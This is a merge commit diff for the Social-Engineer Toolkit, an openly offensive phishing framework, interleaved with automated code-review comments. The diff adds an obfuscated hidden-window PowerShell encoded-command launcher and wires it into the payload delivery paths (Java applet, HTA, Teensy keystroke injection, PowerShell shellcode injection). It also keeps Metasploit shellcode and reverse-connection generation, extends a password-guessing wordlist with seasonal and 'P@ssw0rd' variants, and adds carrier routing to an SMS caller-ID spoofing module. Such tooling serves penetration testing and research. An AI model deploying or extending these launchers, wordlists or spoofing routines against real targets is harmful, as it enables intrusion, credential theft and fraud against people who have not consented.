Merge pull request #1 from trustedsec/master

Update of recent changes
mikecjudge 2017-02-23 00:11:24 +13:00 committed by GitHub
commit f165bcb6ac
36 changed files with 293 additions and 267 deletions


@ -1,3 +1,29 @@
~~~~~~~~~~~~~~~~
version 7.5.1
~~~~~~~~~~~~~~~~
* moved config file to be the first identifier for metasploit config file then move onto other methods. Possible for conflicts to override
~~~~~~~~~~~~~~~~
version 7.5
~~~~~~~~~~~~~~~~
* updated config to turn apache_server default from on to off. can switch this under /etc/setoolkit/set.config to on if you want apache.
* wrote centralized function for new powershell encodedcommand obfsucation
* added encodedcommand to java applet
* added encodedcommand to hta attack vector
* added encodedcommand to teensy
* added encodedcommand to all modules with powershell injection
* remove sms modules templates that were no longer used
* added routes to help with spoofing - default is auto
~~~~~~~~~~~~~~~~
version 7.4.5
~~~~~~~~~~~~~~~~
* update fasttrack wordlist (git suggestion)
* updated teensy codebase thanks to mikecjudge
~~~~~~~~~~~~~~~~
version 7.4.4
~~~~~~~~~~~~~~~~


@ -41,7 +41,7 @@ if not os.path.isfile("/etc/setoolkit/set.config"):
with open("/etc/setoolkit/set.config") as fileopen:
data = fileopen.read()
if "CONFIG_VERSION=7.3.9" not in data:
if "CONFIG_VERSION=7.5" not in data:
print("[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
shutil.move("/etc/setoolkit/set.config", "/etc/setoolkit/set.config.bak")
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")


@ -24,7 +24,7 @@
## ##
## There are additional options; read the comments for additional descriptions. ##
## ##
## CONFIG_VERSION=7.3.9 ##
## CONFIG_VERSION=7.5 ##
## ##
##################################################################################################
##################################################################################################
@ -92,7 +92,7 @@ TIME_DELAY_EMAIL=1
#
### Use Apache instead of the standard Python web server. This will increase the speed
### of the attack vector.
APACHE_SERVER=ON
APACHE_SERVER=OFF
#
### Path to the Apache web root.
APACHE_DIRECTORY=/var/www


@ -1198,6 +1198,11 @@ and send the QRCode via a mailer.
# sms spoofing module option 10
if main_menu_choice == '10':
### TEMPORARILY DISABLED
#print_error("This module is currently disabled as spoofmytextmessage.com is currently experiencing issues. As soon as it is working again or I can rework the module, this will remain disabled.")
#raw_input("Press {return} to connect to the main menu.")
try:
module_reload(src.sms.sms)
except:
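Review bot: The `except:` that closes the hunk is bare, so any failure in `module_reload(src.sms.sms)` — an ImportError from the re-enabled module, a SyntaxError, even a KeyboardInterrupt — is caught, and the handler body lies outside the hunk so what happens next is not visible here. Narrow it to the failure the re-enable is guarding against, `except ImportError as err:`, and surface `err`, so a broken sms module is reported rather than silently skipped. The `#print_error`/`#raw_input` lines kept as comments above the try are dead code now that the module is re-enabled and can go.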


@ -1 +1 @@
7.4.4
7.5.1


@ -1,4 +1,4 @@
1#!/usr/bin/env python
1 # !/usr/bin/env python
#
# Centralized core modules for SET
#
@ -19,7 +19,7 @@ from src.core import dictionaries
import io
import trace
#python 2 and 3 compatibility
# python 2 and 3 compatibility
try:
from urllib.request import urlopen
except ImportError:
@ -53,6 +53,8 @@ except ImportError:
pass
# get the main SET path
def definepath():
if check_os() == "posix":
if os.path.isfile("setoolkit"):
@ -64,6 +66,8 @@ def definepath():
return os.getcwd()
# check operating system
def check_os():
if os.name == "nt":
operating_system = "windows"
@ -158,6 +162,8 @@ else:
self.DARKCYAN = ''
# this will be the home for the set menus
def setprompt(category, text):
# if no special prompt and no text, return plain prompt
if category == '0' and text == "":
@ -190,6 +196,7 @@ def setprompt(category, text):
promptstring = promptstring + "> " + text + ":"
return promptstring
def yesno_prompt(category, text):
valid_response = False
while not valid_response:
@ -205,6 +212,7 @@ def yesno_prompt(category, text):
print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
return response
def return_continue():
print(("\n Press " + bcolors.RED +
"<return> " + bcolors.ENDC + "to continue"))
@ -222,6 +230,8 @@ DEBUG_LEVEL = 0
# 6 = imports, info messages, menus with pause for <ENTER>
debugFrameString = '-' * 72
def debug_msg(currentModule, message, msgType):
if DEBUG_LEVEL == 0:
pass # stop evaluation efficiently
@ -242,27 +252,35 @@ def mod_name():
#
# RUNTIME MESSAGES ############
def print_status(message):
print(bcolors.GREEN + bcolors.BOLD + "[*] " + bcolors.ENDC + str(message))
def print_info(message):
print(bcolors.BLUE + bcolors.BOLD + "[-] " + bcolors.ENDC + str(message))
def print_info_spaces(message):
print(bcolors.BLUE + bcolors.BOLD + " [-] " + bcolors.ENDC + str(message))
def print_warning(message):
print(bcolors.YELLOW + bcolors.BOLD + "[!] " + bcolors.ENDC + str(message))
def print_error(message):
print(bcolors.RED + bcolors.BOLD +
"[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC)
def get_version():
define_version = open("src/core/set.version", "r").read().rstrip()
#define_version = '7.2.3'
# define_version = '7.2.3'
return define_version
class create_menu:
def __init__(self, text, menu):
@ -284,6 +302,7 @@ class create_menu:
print('\n 99) Return to Main Menu\n')
return
def validate_ip(address):
try:
if socket.inet_aton(address):
@ -303,80 +322,84 @@ def validate_ip(address):
#
# grab the metaspoit path
#
def meta_path():
# DEFINE METASPLOIT PATH
trigger = 0
try:
# specific for backbox linux
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
msf_path = "/opt/metasploit-framework/"
# pull from config first
msf_path = check_config("METASPLOIT_PATH=")
if not msf_path.endswith("/"):
msf_path = msf_path + "/"
if os.path.isfile(msf_path + "msfconsole"):
trigger = 1
# if we are using just the standard path for msfconsole
if os.path.isfile("/usr/bin/msfconsole"):
if trigger == 0:
msf_path = "/usr/bin/"
trigger = 1
# specific for backbox linux
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
if trigger == 0:
msf_path = "/opt/metasploit-framework/"
trigger = 1
# specific for kali linux
if os.path.isfile("/opt/metasploit/apps/pro/msf3/msfconsole"):
# left blank since you can call launcher and ruby1.9 - 2x issues
# are there
msf_path = ""
trigger = 1
if trigger == 0:
msf_path = ""
trigger = 1
# specific for backtrack5 and other backtrack versions
if os.path.isfile("/opt/framework3/msf3/msfconsole"):
msf_path = "/opt/framework3/msf3/"
trigger = 1
if trigger == 0:
msf_path = "/opt/framework3/msf3/"
trigger = 1
if os.path.isfile("/opt/framework/msf3/msfconsole"):
msf_path = "/opt/framework/msf3/"
trigger = 1
if trigger == 0:
msf_path = "/opt/framework/msf3/"
trigger = 1
if os.path.isfile("/opt/metasploit/msf3/msfconsole"):
msf_path = "/opt/metasploit/msf3/"
trigger = 1
if trigger == 0:
msf_path = "/opt/metasploit/msf3/"
trigger = 1
# specific for pwnpad and pwnplug (pwnie express)
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
msf_path = "/opt/metasploit-framework/"
trigger = 1
if trigger == 0:
msf_path = "/opt/metasploit-framework/"
trigger = 1
# specific for pentesters framework github.com/trustedsec/ptf
if os.path.isfile("/pentest/exploitation/metasploit/msfconsole"):
msf_path = "/pentest/exploitation/metasploit/"
trigger = 1
# if we are using just the standard path for msfconsole
if os.path.isfile("/usr/bin/msfconsole"):
msf_path = "/usr/bin/"
trigger = 1
if trigger == 0:
msf_path = "/pentest/exploitation/metasploit/"
trigger = 1
# Kali linux bleeding edge should return this in order to work
if os.path.isfile("/usr/share/metasploit-framework/msfconsole"):
msf_path = "/usr/share/metasploit-framework/"
trigger = 1
if trigger == 0:
msf_path = "/usr/share/metasploit-framework/"
trigger = 1
# if we are using windows
if check_os() == "windows":
print_warning(
"Metasploit payloads are not currently supported. This is coming soon.")
msf_path = False
except Exception as e:
print_status("Something went wrong. Printing error: " + str(e))
# if all else fails then pull config path
if trigger == 0:
msf_path = check_config("METASPLOIT_PATH=")
if msf_path.endswith("/"):
pass
else:
msf_path = msf_path + "/"
if not os.path.isfile(msf_path + "/msfconsole"):
# if we didn't find anything
if trigger == 0:
print_error(
"Metasploit path not found. These payloads will be disabled.")
print_error(
"Please configure Metasploit's path in the /etc/setoolkit/set.config file.")
msf_path = False
except Exception as e:
print_status("Something went wrong. Printing error: " + str(e))
# this is an option if we don't want to use Metasploit period
check_metasploit = check_config("METASPLOIT_MODE=").lower()
if check_metasploit != "on":
@ -386,6 +409,8 @@ def meta_path():
#
# grab the metaspoit path
#
def meta_database():
# DEFINE METASPLOIT PATH
meta_path = open("/etc/setoolkit/set.config", "r").readlines()
@ -477,6 +502,8 @@ def cleanup_routine():
#
# Update The Social-Engineer Toolkit
#
def update_set():
backbox = check_backbox()
kali = check_kali()
@ -506,6 +533,8 @@ def update_set():
#
# Pull the help menu here
#
def help_menu():
fileopen = open("README.md", "r").readlines()
for line in fileopen:
@ -529,6 +558,8 @@ def date_time():
#
# generate a random string
#
def generate_random_string(low, high):
length = random.randint(low, high)
letters = string.ascii_letters + string.digits
@ -538,6 +569,8 @@ def generate_random_string(low, high):
# clone JUST a website, and export it.
# Will do no additional attacks.
#
def site_cloner(website, exportpath, *args):
grab_ipaddress()
ipaddr = grab_ipaddress()
@ -602,6 +635,8 @@ def start_web_server(directory):
#
# this will start a web server without threads
#
def start_web_server_unthreaded(directory):
try:
# import the threading, socketserver, and simplehttpserver
@ -669,6 +704,8 @@ def java_applet_attack(website, port, directory):
# this will create a raw PDE file for you to use in your teensy device
#
#
def teensy_pde_generator(attack_method):
# grab the ipaddress
@ -734,12 +771,16 @@ def teensy_pde_generator(attack_method):
#
# Expand the filesystem windows directory
#
def windows_root():
return os.environ['WINDIR']
#
# core log file routine for SET
#
def log(error):
try:
# open log file only if directory is present (may be out of directory
@ -763,6 +804,8 @@ def log(error):
#
# upx encoding and modify binary
#
def upx(path_to_file):
# open the set_config
fileopen = open("/etc/setoolkit/set.config", "r")
@ -806,6 +849,7 @@ def upx(path_to_file):
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
time.sleep(3)
def show_banner(define_version, graphic):
if graphic == "1":
@ -821,7 +865,7 @@ def show_banner(define_version, graphic):
[---] The Social-Engineer Toolkit (""" + bcolors.YELLOW + """SET""" + bcolors.BLUE + """) [---]
[---] Created by:""" + bcolors.RED + """ David Kennedy """ + bcolors.BLUE + """(""" + bcolors.YELLOW + """ReL1K""" + bcolors.BLUE + """) [---]
Version: """ + bcolors.RED + """%s""" % (define_version) + bcolors.BLUE + """
Codename: '""" + bcolors.YELLOW + """Recharged""" + bcolors.ENDC + bcolors.BLUE + """'
Codename: '""" + bcolors.YELLOW + """Ghost""" + bcolors.ENDC + bcolors.BLUE + """'
[---] Follow us on Twitter: """ + bcolors.PURPLE + """@TrustedSec""" + bcolors.BLUE + """ [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE + """@HackingDave""" + bcolors.BLUE + """ [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE + """ [---]
@ -833,7 +877,8 @@ def show_banner(define_version, graphic):
""" Join us on irc.freenode.net in channel #setoolkit\n""" + bcolors.ENDC)
print(bcolors.BOLD + """ The Social-Engineer Toolkit is a product of TrustedSec.\n\n Visit: """ +
bcolors.GREEN + """https://www.trustedsec.com\n""" + bcolors.ENDC)
print(bcolors.BLUE + """ It's easy to update using the PenTesters Framework! (PTF)\nVisit """ + bcolors.YELLOW + """https://github.com/trustedsec/ptf""" + bcolors.BLUE + """ to update all your tools!\n\n""" + bcolors.ENDC)
print(bcolors.BLUE + """ It's easy to update using the PenTesters Framework! (PTF)\nVisit """ + bcolors.YELLOW +
"""https://github.com/trustedsec/ptf""" + bcolors.BLUE + """ to update all your tools!\n\n""" + bcolors.ENDC)
# here we check if there is a new version of SET - if there is, then
# display a banner
@ -842,25 +887,32 @@ def show_banner(define_version, graphic):
# pull version
try:
version = ""
def pull_version():
if not os.path.isfile(setdir + "/version.lock"):
try:
url = ('https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version')
url = (
'https://raw.githubusercontent.com/trustedsec/social-engineer-toolkit/master/src/core/set.version')
version = urlopen(url).read().rstrip().decode('utf-8')
filewrite = open(setdir + "/version.lock", "w")
filewrite.write(version)
filewrite.close()
except KeyboardInterrupt: version = "keyboard interrupt"
except KeyboardInterrupt:
version = "keyboard interrupt"
else: version = open(setdir + "/version.lock", "r").read()
else:
version = open(setdir + "/version.lock", "r").read()
if cv != version:
if version != "":
print(bcolors.RED + " There is a new version of SET available.\n " + bcolors.GREEN + " Your version: " + bcolors.RED + cv + bcolors.GREEN + "\n Current version: " + bcolors.ENDC + bcolors.BOLD + version + bcolors.YELLOW + "\n\nPlease update SET to the latest before submitting any git issues.\n\n" + bcolors.ENDC)
print(bcolors.RED + " There is a new version of SET available.\n " + bcolors.GREEN + " Your version: " + bcolors.RED + cv + bcolors.GREEN +
"\n Current version: " + bcolors.ENDC + bcolors.BOLD + version + bcolors.YELLOW + "\n\nPlease update SET to the latest before submitting any git issues.\n\n" + bcolors.ENDC)
# why urllib and sockets cant control DNS resolvers is beyond me - so we use this as a hack job to add a delay and kill if updates are taking too long
# why urllib and sockets cant control DNS resolvers is beyond me - so
# we use this as a hack job to add a delay and kill if updates are
# taking too long
p = multiprocessing.Process(target=pull_version)
p.start()
@ -869,14 +921,16 @@ def show_banner(define_version, graphic):
# If thread is still active
if p.is_alive():
print(bcolors.RED + " Unable to check for new version of SET (is your network up?)\n" + bcolors.ENDC)
print(
bcolors.RED + " Unable to check for new version of SET (is your network up?)\n" + bcolors.ENDC)
# terminate the process
p.terminate()
p.join()
except Exception as err:
print(err)
#pass
# pass
def show_graphic():
menu = random.randrange(2, 15)
@ -1088,7 +1142,6 @@ def show_graphic():
``:::::::::::::::::::''
``:::::::::''""" + bcolors.ENDC)
if menu == 14:
print(bcolors.BOLD + """
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
@ -1174,10 +1227,14 @@ def set_check():
return False
# if the user specifies 99
def menu_back():
print_info("Returning to the previous menu...")
# used to generate random templates for the phishing schema
def custom_template():
try:
print (" [****] Custom Template Generator [****]\n")
@ -1233,10 +1290,14 @@ def check_length(choice, max):
counter = 1
# valid if IP address is legit
def is_valid_ip(ip):
return is_valid_ipv4(ip) or is_valid_ipv6(ip)
# ipv4
def is_valid_ipv4(ip):
pattern = re.compile(r"""
^
@ -1275,6 +1336,8 @@ def is_valid_ipv4(ip):
return pattern.match(ip) is not None
# ipv6
def is_valid_ipv6(ip):
"""Validates IPv6 addresses.
"""
@ -1338,6 +1401,8 @@ def check_config(param):
return line[1]
# copy an entire folder function
def copyfolder(sourcePath, destPath):
for root, dirs, files in os.walk(sourcePath):
@ -1382,6 +1447,8 @@ def check_options(option):
return trigger
# future home to update one localized set configuration file
def update_options(option):
# if the file isn't there write a blank file
if not os.path.isfile(setdir + "/set.options"):
@ -1403,6 +1470,8 @@ def update_options(option):
filewrite.close()
# python socket listener
def socket_listener(port):
port = int(port) # needed integer for port
host = '' # Symbolic name meaning the local host
@ -1429,6 +1498,8 @@ def socket_listener(port):
conn.close()
# generates powershell payload
def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
# generate our shellcode first
shellcode = metasploit_shellcode(payload, ipaddr, port)
@ -1436,7 +1507,7 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
# if not "reverse_http" in payload or not "reverse_https" in payload:
if not "http" in payload:
shellcode = shellcode_replace(ipaddr, port, shellcode).rstrip()
shellcode = shellcode_replace(ipaddr, port, shellcode).rstrip()
# sub in \x for 0x
shellcode = re.sub("\\\\x", "0x", shellcode)
shellcode = shellcode.replace("\\", "")
@ -1485,6 +1556,8 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
return base64.b64encode(powershell_command.encode('utf_16_le')).decode("ascii")
# generate base shellcode
def generate_shellcode(payload, ipaddr, port):
msf_path = meta_path()
@ -1502,6 +1575,8 @@ def generate_shellcode(payload, ipaddr, port):
return data
# this will take input for shellcode and do a replace for IP addresses
def shellcode_replace(ipaddr, port, shellcode):
# split up the ip address
ip = ipaddr.split('.')
@ -1565,6 +1640,8 @@ def shellcode_replace(ipaddr, port, shellcode):
return shellcode
# exit routine
def exit_set():
cleanup_routine()
print("\n\n Thank you for " + bcolors.RED + "shopping" + bcolors.ENDC +
@ -1610,6 +1687,8 @@ def metasploit_shellcode(payload, ipaddr, port):
# here we encrypt via aes, will return encrypted string based on secret
# key which is random
def encryptAES(secret, data):
# the character used for padding--with a block cipher such as AES, the value
@ -1636,6 +1715,8 @@ def encryptAES(secret, data):
return str(aes)
# compare ports to make sure its not already in a config file for metasploit
def check_ports(filename, port):
fileopen = open(filename, "r")
data = fileopen.read()
@ -1680,6 +1761,8 @@ class DNSQuery:
return packet
# main dns routine
def dns():
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udps.bind(('', 53))
@ -1695,6 +1778,8 @@ def dns():
udps.close()
# start dns
def start_dns():
thread.start_new_thread(dns, ())
@ -1717,6 +1802,8 @@ setdir = setdir()
# convert an IP address from its dotted-quad format to its
# 32 binary digit representation
def ip2bin(ip):
b = ""
inQuads = ip.split(".")
@ -1732,6 +1819,8 @@ def ip2bin(ip):
# convert a decimal number to binary representation
# if d is specified, left-pad the binary number with 0s to that length
def dec2bin(n, d=None):
s = ""
while n > 0:
@ -1748,6 +1837,8 @@ def dec2bin(n, d=None):
return s
# convert a binary string into an IP address
def bin2ip(b):
ip = ""
for i in range(0, len(b), 8):
@ -1755,6 +1846,8 @@ def bin2ip(b):
return ip[:-1]
# print a list of IP addresses based on the CIDR block specified
def printCIDR(c):
parts = c.split("/")
baseIP = ip2bin(parts[0])
@ -1777,6 +1870,8 @@ def printCIDR(c):
return breakdown
# input validation routine for the CIDR block specified
def validateCIDRBlock(b):
# appropriate format for CIDR block ($prefix/$subnet)
p = re.compile("^([0-9]{1,3}\.){0,3}[0-9]{1,3}(/[0-9]{1,2}){1}$")
@ -1799,6 +1894,8 @@ def validateCIDRBlock(b):
# Queries a remote host on UDP:1434 and returns MSSQL running port
# Written by Larry Spohn (spoonman) @ TrustedSec
def get_sql_port(host):
# Build the socket with a .1 second timeout
@ -1815,7 +1912,8 @@ def get_sql_port(host):
d = s.recvfrom(1024)
sql_port = d[0].split(";")[9]
# if we have an exception, udp 1434 isnt there could be firewalled off so we need to check 1433 just in case
# if we have an exception, udp 1434 isnt there could be firewalled off
# so we need to check 1433 just in case
except:
sql_port = "1433"
pass
@ -1829,13 +1927,16 @@ def get_sql_port(host):
return host + ":" + sql_port
# if port is closed
except: return None
except:
return None
except Exception as err:
print(err)
pass
# capture output from a function
def capture(func, *args, **kwargs):
"""Capture the output of func when called with the given arguments.
@ -1855,6 +1956,8 @@ def capture(func, *args, **kwargs):
return (result, c1.getvalue(), c2.getvalue())
# check to see if we are running backbox linux
def check_backbox():
if os.path.isfile("/etc/issue"):
backbox = open("/etc/issue", "r")
@ -1869,6 +1972,8 @@ def check_backbox():
return "Non-BackBox"
# check to see if we are running kali linux
def check_kali():
if os.path.isfile("/etc/apt/sources.list"):
kali = open("/etc/apt/sources.list", "r")
@ -1883,6 +1988,8 @@ def check_kali():
return "Non-Kali"
# here we give multiple options to specify for SET java applet
def applet_choice():
# prompt here
@ -1925,6 +2032,8 @@ Select which option you want:
module_reload(src.html.unsigned.verified_sign)
# reload module function for python 2 and python 3
def module_reload(module):
if sys.version_info >= (3, 0):
import importlib
@ -1933,10 +2042,14 @@ def module_reload(module):
reload(module)
# used to replace any input that we have from python 2 to python 3
def input(string):
return raw_input(string)
# fetch URL needed for web cloning
def fetch_template():
fileopen = open(setdir + "/site.template").readlines()
for line in fileopen:
@ -1966,3 +2079,12 @@ def tail(filename):
else:
print_error("File not found, cannot tail.")
# this will create an obfsucated powershell encoded command string to be
# used through SET
def powershell_encodedcommand():
ran1 = generate_random_string(1, 2)
ran2 = generate_random_string(1, 2)
ran3 = generate_random_string(1, 2)
ran4 = generate_random_string(1, 2)
return 'powershell -w 1 -C "sv %s -;sv %s ec;sv %s ((gv %s).value.toString()+(gv %s).value.toString());powershell (gv %s).value.toString() "' % (ran1, ran2, ran3, ran1, ran2, ran3)
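Review bot: In the meta_path hunk the config value is now probed first, but `check_config("METASPLOIT_PATH=")` has `"/"` appended and is tested with `os.path.isfile` before anything checks that it is a non-empty string: a blank METASPLOIT_PATH turns into the probe `/msfconsole`, and a non-string miss value (check_config's miss path is not visible here) raises in `.endswith`, is swallowed by the new `except Exception as e` at the end of the try, and leaves `msf_path` unassigned for whatever follows the try. Guarding the config probe keeps the distribution-path search and the new not-found error unchanged. meta_path continues past the hunk.
```python
    try:
        # pull from config first; a blank METASPLOIT_PATH must not become the probe "/msfconsole"
        msf_path = check_config("METASPLOIT_PATH=") or ""
        if msf_path:
            msf_path = msf_path.rstrip("/") + "/"
            if os.path.isfile(msf_path + "msfconsole"):
                trigger = 1
        # … unchanged: distribution path probes, windows warning, not-found error …
```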


@ -262,7 +262,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
x86 = file(core.setdir + "x86.powershell").read().rstrip()
# x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
x86 = core.powershell_encodedcommand() + x86
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")


@ -83,10 +83,8 @@ try:
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
#with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
# x86 = fileopen.read()
x86 = open(core.setdir + "x86.powershell", "r").read()
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
x86 = core.powershell_encodedcommand() + x86
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)


@ -1,3 +1,43 @@
Spring2017
Spring2016
Spring2015
Spring2014
Spring2013
spring2017
spring2016
spring2015
spring2014
spring2013
Summer2017
Summer2016
Summer2015
Summer2014
Summer2013
summer2017
summer2016
summer2015
summer2014
summer2013
Autumn2017
Autumn2016
Autumn2015
Autumn2014
Autumn2013
autumn2017
autumn2016
autumn2015
autumn2014
autumn2013
Winter2017
Winter2016
Winter2015
Winter2014
Winter2013
winter2017
winter2016
winter2015
winter2014
winter2013
P@55w0rd
P@ssw0rd!
P@55w0rd!


@ -57,7 +57,7 @@ if powershell_menu_choice != "99":
# here we format everything for us
with open(core.setdir + "/x86.powershell") as fileopen:
x86 = fileopen.read()
x86 = "powershell -nop -window hidden -noni -e " + x86
x86 = core.powershell_encodedcommand() + x86
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell/")))
with open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
filewrite.write(x86)


@ -1,6 +1,7 @@
#!/usr/bin/env python
# coding=utf-8
import src.core.setcore as core
#import src.core.setcore as core
from src.core.setcore import *
import sys
import getpass
@ -15,7 +16,7 @@ try:
import requests
except ImportError:
core.print_error("Looks like you dont have python-requests installed. "
print_error("Looks like you dont have python-requests installed. "
"Please install (apt-get install python-requests) and try again.")
input("Press {return} to continue.")
trigger = 1
@ -35,7 +36,7 @@ def _do_sms():
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
@ -43,31 +44,40 @@ def _do_sms():
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
core.print_status("Note that the password below will be masked and you will not see the output.")
pw = getpass.getpass(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
print_status("Please note that spoofing may not work with all carriers. If it doesn't work, SET cannot be changed or modified in order to make it work. Would recommend trying different routes to get it working, if that doesn't work, you will need to contact spoofmytextmessages.com")
email = input(setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
print_status("Note that the password below will be masked and you will not see the output.")
pw = getpass.getpass(setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
tocountry = input(setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
fromcountry = input(setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
tonumber = input(setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
"country code (example: +15551234567)"))
fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
fromnumber = input(setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
"country code (example: +15551234567)"))
message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))
message = input(setprompt(["7"], "Enter the message you want to send via the text message"))
print_status("Routes provide different methods for different carriers. Usually auto is the best option, but you may want to try 1 or 2. The options are [a] (auto), 1, or 2.")
route = input(setprompt(["7"], "Enter the route (test different routes) (options a, 1, or 2)[a]"))
if route == "": route = ("auto")
if route == "a": route = ("auto")
# note that the function for this is in a compiled python file with no source -
# this was done at the request of the third party we use since the API is not documented.
@ -75,11 +85,11 @@ def _do_sms():
# and json and uses that to interact with the API. From a security standpoint if you are
# uncomfortable using this - feel free to ping me and I can walk you through what I do
# without giving away the API from the third party.
from src.sms.protectedapi import send_sms
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
from src.sms.spoofapi import send_sms
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message, route)
else:
core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
# launch sms
try:
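Review bot: `route` is forwarded to `send_sms` exactly as typed after the two one-line rewrites `if route == "": route = ("auto")` / `if route == "a": route = ("auto")`, so any other input — `3`, free text — is posted to the third-party API unchecked, although the prompt advertises only a, 1 or 2. Replace the two lines with `if route not in ("1", "2"): route = "auto"` (or re-prompt on anything outside the three options) so the value sent matches what the user was offered. _do_sms starts before the hunk and its `send_sms` call is the last statement visible here.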


@ -8,7 +8,7 @@ import json
import requests
from src.core.setcore import *
def send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message):
def send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message, route):
try: input = raw_input
except: pass
@ -38,7 +38,7 @@ def send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message):
url = 'https://api.spoofmytextmessage.com/2.0/index.php?task=send'
payload = {'non': 'number', 'fromnumber': fromnumber, 'to': tonumber, 'tocountry': tocountry, 'fromcountry': fromcountry,
'text': message, 'code': code, 'task': 'send', 'terms': '1', 'secureid': secureid, 'mid': id, 'email': email,
'source': 'settoolkit', 'osname': 'settoolkit', 'app': 'settoolkit', 'selves': '1'}
'source': 'settoolkit', 'osname': 'settoolkit', 'app': 'settoolkit', 'selves': '1', 'route' : route}
r = requests.post(url, data=payload)
@ -49,7 +49,7 @@ def send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message):
else:
print_error("We were unable to successfully send the text message. Check all your settings and try again.")
print("Printing error from spoofmytextmessage.com: " + r.content)
print_error("Printing error from spoofmytextmessage.com: " + r.content)
input("Press {return} to return to the previous menu.")
except IndexError as error:
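Review bot: The rewritten line `print_error("Printing error from spoofmytextmessage.com: " + r.content)` concatenates `str` with `r.content`, which is `bytes` under Python 3 — a version the module supports, given the `input = raw_input` shim at the top of the first hunk — so the error-reporting path itself raises TypeError instead of showing the API's message; use `print_error("Printing error from spoofmytextmessage.com: " + r.text)`. The new `route` parameter is placed into the POST body as received, so the caller is the only place it is constrained. send_sms begins and ends outside the hunks.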


@ -78,7 +78,7 @@ void loop()
delay(5000);
CommandAtRunBar("cmd");
delay(750);
Keyboard.print("powershell -nop -window hidden -noni -EncodedCommand ");
Keyboard.print("%s");
// Write the binary to the notepad file
int i;
for (i = 0; i < sizeof(exploit)/sizeof(int); i++) {
@ -149,7 +149,7 @@ Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
""")
""" % (core.powershell_encodedcommand())
print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.ino")))
if not os.path.isdir(os.path.join(core.setdir + "reports")):
os.makedirs(os.path.join(core.setdir + "reports"))
